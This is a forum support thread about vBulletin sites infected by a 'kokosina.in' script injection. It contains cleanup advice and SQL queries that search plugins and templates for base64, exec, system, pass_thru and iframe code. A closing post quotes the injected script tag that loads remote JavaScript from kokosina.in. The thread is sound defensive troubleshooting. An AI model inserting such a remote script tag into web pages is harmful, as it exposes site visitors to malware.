Wayne it was fresh copy off the Vb site and it still shows an error ???

Has anyone yet found a definitive answer to remove kokosina form their site, and keep it away?

I just seem to be making things worse for myself. I went into phpmyadmin to try and back up my files. I don't know what the heck I did when I was in there, but now all I'm getting when I go to view my website is a Database Error message: www.theroaringseason.com

This is really driving me crazy! My site has been closed for a week because some loser hacked it, now every time I try to do something to try and fix the issue, I make things worse!

Has anyone yet found a definitive answer to remove kokosina form their site, and keep it away?

I just seem to be making things worse for myself. I went into phpmyadmin to try and back up my files. I don't know what the heck I did when I was in there, but now all I'm getting when I go to view my website is a Database Error message: www.theroaringseason.com

This is really driving me crazy! My site has been closed for a week because some loser hacked it, now every time I try to do something to try and fix the issue, I make things worse!

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

3) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

4) Check your plugins for any base64 code. I recommend using against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

5) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

Query for step 4 and 5 -
SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

6) Run this query:
SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

Your MySQL Server is offline for some reason. You're host needs to restart it.

Open a support ticket for further help in cleaning up your site. https://www.vbulletin.com/go/techsupport/

Thanks Wayne, I have opened a support ticket, as suggested.

I have spoken to my web host and they've fixed the MySQL issue, but when the site went back up, they noticed it has a trojan virus, which I assume is the Kokosina.in attack. Has anyone yet found a definitive way to remove this? I will be doing the suggestions made by Wayne earlier in this thread, but can anyone who has tried this managed to remove it?

Doing a Google search on kokosina.in it seems there are several vbulletin sites all around the world that have now been hit by this.

Can anyone verify that upgrading to 4.1.9 fixes this kokosina issue. I tried doing what Wayne said in post 11 but it is still there. Either I did it wrong or it isn't working.

FYI



Did not fix the problem.

<scripttype="text/javascript" src="http://kokosina.in/1"></script>

Still appears in the source code.